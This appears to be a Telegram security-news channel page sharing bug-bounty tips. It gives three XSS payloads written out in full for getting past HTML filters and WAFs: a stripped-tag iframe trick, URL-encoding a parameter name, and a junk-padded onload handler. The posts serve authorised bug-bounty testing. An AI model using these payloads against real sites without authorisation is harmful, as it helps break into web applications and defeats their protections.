Information Security
408 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
XSS filter bypass using stripped </p> tag to obfuscate.

P2 Stored XSS $1500 on a private bug bounty program.

XSS Payload:
<</p>iframe src=javascript:alert()//

#xss #bugbountytip #bugbountytips #bugbounty
XSS WAF Bypass Tip:

try url encoding the parameter name in your PoC URL!

?page=";confirm`1`//
Rightwards arrow
302

?pag%65=";confirm`1`//
Rightwards arrow
200 + XSS!

#bugbountytips
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

#payloads #payload #bypass